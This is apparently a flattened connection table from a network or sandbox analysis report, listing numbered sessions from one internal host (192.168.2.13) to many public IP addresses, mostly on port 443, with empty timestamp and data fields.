                                                11298192.168.2.133620852.252.200.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11299192.168.2.1351888111.166.135.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11300192.168.2.135498698.109.97.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11301192.168.2.1338426146.173.207.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11302192.168.2.135097698.48.151.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11303192.168.2.1342426201.165.49.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11304192.168.2.135877886.235.86.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11305192.168.2.1344408142.30.252.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11306192.168.2.135653848.71.223.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11307192.168.2.136045691.117.129.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11308192.168.2.133811299.35.253.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11309192.168.2.1344894165.183.82.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11310192.168.2.1349496171.216.6.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11311192.168.2.1335186171.239.154.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11312192.168.2.1352902191.152.218.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11313192.168.2.1334502217.165.88.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11314192.168.2.1338016117.146.179.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11315192.168.2.133580866.66.166.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11316192.168.2.1334030138.134.9.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11317192.168.2.1339854119.237.199.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11318192.168.2.135345477.227.82.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11319192.168.2.133800046.193.71.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11320192.168.2.1345646117.109.10.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11321192.168.2.1341142181.88.59.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11322192.168.2.1359206187.111.253.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11323192.168.2.1339918167.6.230.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11324192.168.2.1342346201.64.173.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11325192.168.2.134170413.61.189.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11326192.168.2.134145818.104.32.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11327192.168.2.1355166169.184.2.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11328192.168.2.1345016184.14.43.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11329192.168.2.1357848182.115.25.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11330192.168.2.1336206217.244.174.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11331192.168.2.134889417.187.182.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11332192.168.2.1338692139.208.71.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11333192.168.2.135187225.147.157.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11334192.168.2.133908851.21.53.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11335192.168.2.1335782126.211.182.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11336192.168.2.135276434.227.113.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11337192.168.2.135180298.12.90.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11338192.168.2.135842047.145.163.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11339192.168.2.1358232185.220.116.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11340192.168.2.135604448.171.72.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11341192.168.2.1345222178.18.199.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11342192.168.2.13348725.204.184.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11343192.168.2.1346116106.115.247.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11344192.168.2.1355642108.173.84.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11345192.168.2.133442032.236.8.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11346192.168.2.134480449.117.18.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11347192.168.2.134174672.213.25.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11348192.168.2.134234473.106.78.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11349192.168.2.1353984197.47.117.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11350192.168.2.1354320179.76.136.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11351192.168.2.1340236187.61.111.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11352192.168.2.136085497.241.254.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11353192.168.2.1356620101.156.42.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11354192.168.2.1346508198.68.224.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11355192.168.2.1336720136.11.191.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11356192.168.2.1351938140.4.215.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11357192.168.2.134641486.252.245.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11358192.168.2.1348796190.250.45.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11359192.168.2.135573883.142.50.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11360192.168.2.1353600209.76.21.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11361192.168.2.134856699.80.10.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11362192.168.2.1344486131.214.108.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11363192.168.2.133721053.80.64.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11364192.168.2.1355854162.171.182.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11365192.168.2.1338478113.34.42.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11366192.168.2.1341060182.3.98.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11367192.168.2.134226489.39.88.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11368192.168.2.134767440.254.30.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11369192.168.2.1350638190.224.215.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11370192.168.2.133570274.253.232.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11371192.168.2.135860234.111.44.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11372192.168.2.1343764159.198.59.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11373192.168.2.1335740181.203.187.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11374192.168.2.1359082109.240.121.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11375192.168.2.134058080.70.16.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11376192.168.2.1338774120.13.164.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11377192.168.2.1350984172.65.34.25437215
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11378192.168.2.133414494.122.69.938080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11379192.168.2.135115272.69.172.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11380192.168.2.134548647.130.13.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11381192.168.2.1355216112.97.226.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11382192.168.2.1347784114.175.248.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11383192.168.2.1348590197.238.207.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11384192.168.2.1333874223.248.196.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11385192.168.2.1356382170.157.175.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11386192.168.2.134071659.124.182.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11387192.168.2.135406444.41.112.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11388192.168.2.1355604117.154.177.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11389192.168.2.1347988222.134.155.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11390192.168.2.1335798161.78.83.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11391192.168.2.1353290169.3.71.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11392192.168.2.1341490221.10.72.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11393192.168.2.1356528176.113.244.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11394192.168.2.135778266.184.155.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11395192.168.2.1351634131.200.18.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11396192.168.2.1335762129.211.10.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11397192.168.2.1343546105.11.193.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11398192.168.2.134148635.9.205.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11399192.168.2.1352260143.30.136.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11400192.168.2.135770854.59.199.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11401192.168.2.1341712160.250.74.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11402192.168.2.133864876.90.182.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11403192.168.2.1332828179.192.208.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11404192.168.2.1350388203.242.152.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11405192.168.2.1355942112.43.199.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11406192.168.2.133947445.216.96.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11407192.168.2.133807824.60.229.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11408192.168.2.135010696.145.224.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11409192.168.2.133565665.60.157.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11410192.168.2.1344878219.220.239.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11411192.168.2.1332832128.67.178.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11412192.168.2.1336790170.251.237.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11413192.168.2.134088490.76.95.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11414192.168.2.134817014.67.176.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11415192.168.2.135920851.146.158.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11416192.168.2.134900647.200.104.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11417192.168.2.1346716167.171.76.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11418192.168.2.1345376146.29.61.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11419192.168.2.134199866.212.170.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11420192.168.2.1350944119.14.74.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11421192.168.2.136053660.242.201.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11422192.168.2.133890864.47.156.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11423192.168.2.135078891.242.242.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11424192.168.2.133586081.157.251.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11425192.168.2.1335864195.63.184.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11426192.168.2.1357022102.109.192.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11427192.168.2.135659223.166.168.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11428192.168.2.1339152121.48.116.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11429192.168.2.133324491.104.67.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11430192.168.2.1345520152.128.38.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11431192.168.2.1351096153.200.104.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11432192.168.2.1337302170.84.120.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11433192.168.2.134635057.176.175.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11434192.168.2.1345974134.99.132.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11435192.168.2.134310424.114.114.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11436192.168.2.133776081.220.114.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11437192.168.2.133917665.21.216.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11438192.168.2.133864636.230.194.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11439192.168.2.1353232130.175.156.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11440192.168.2.1345980223.169.62.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11441192.168.2.134299640.249.117.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11442192.168.2.135534686.31.185.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11443192.168.2.133294044.220.199.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11444192.168.2.1352456206.166.100.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11445192.168.2.1351502120.49.9.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11446192.168.2.1339024129.125.59.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11447192.168.2.1334294101.106.9.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11448192.168.2.133777437.198.64.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11449192.168.2.1345962156.221.254.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11450192.168.2.1343614142.201.125.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11451192.168.2.1333534188.44.96.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11452192.168.2.1343608163.177.39.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11453192.168.2.134907276.60.80.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11454192.168.2.1346096178.91.233.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11455192.168.2.1344826210.229.101.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11456192.168.2.1335482117.61.185.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11457192.168.2.1335620142.16.43.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11458192.168.2.1343312161.20.234.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11459192.168.2.1338266171.226.35.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11460192.168.2.1337076223.2.124.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11461192.168.2.1339474140.176.201.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11462192.168.2.1338728136.206.148.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11463192.168.2.1333688135.90.194.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11464192.168.2.134301896.85.54.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11465192.168.2.1357634212.129.203.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11466192.168.2.13330425.67.164.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11467192.168.2.135491842.222.255.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11468192.168.2.1337924187.207.83.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11469192.168.2.135726850.8.101.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11470192.168.2.1355350195.228.186.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11471192.168.2.1345606155.175.153.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11472192.168.2.1341862128.186.155.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11473192.168.2.13478589.41.16.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11474192.168.2.1355530161.234.220.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11475192.168.2.133686285.129.31.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11476192.168.2.1354486172.1.82.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11477192.168.2.1360770101.176.248.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11478192.168.2.1356756211.246.237.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11479192.168.2.134670481.116.185.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11480192.168.2.1346776172.172.211.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11481192.168.2.1347570154.127.231.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11482192.168.2.1360130212.54.98.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11483192.168.2.134488068.239.146.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11484192.168.2.1357254197.102.54.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11485192.168.2.1347732111.251.90.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11486192.168.2.1353950181.61.25.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11487192.168.2.1355316128.109.105.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11488192.168.2.134167019.74.6.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11489192.168.2.1345378129.26.21.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11490192.168.2.1357438201.197.216.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11491192.168.2.135634270.181.72.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11492192.168.2.1346936177.47.120.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11493192.168.2.1346590194.219.26.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11494192.168.2.1335752128.20.210.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11495192.168.2.133931895.197.253.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11496192.168.2.1353010213.101.27.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11497192.168.2.1333958163.78.251.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11498192.168.2.1354252186.11.233.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11499192.168.2.1360256103.215.98.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11500192.168.2.1358662170.86.193.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11501192.168.2.1345592125.169.231.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11502192.168.2.1359482196.92.23.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11503192.168.2.133727259.206.153.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11504192.168.2.1345974220.155.214.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11505192.168.2.1351476137.132.192.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11506192.168.2.1349990177.241.77.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11507192.168.2.1346908203.139.14.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11508192.168.2.1357138147.179.3.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11509192.168.2.1348924199.124.135.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11510192.168.2.1348966154.127.227.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11511192.168.2.133982069.104.12.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11512192.168.2.1346646167.66.131.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11513192.168.2.1344882176.167.182.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11514192.168.2.1341466118.75.251.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11515192.168.2.135083220.84.117.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11516192.168.2.133687287.57.27.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11517192.168.2.1334920155.52.45.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11518192.168.2.135229699.163.37.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11519192.168.2.1350726133.88.16.70443
                                                TimestampBytes transferredDirectionData


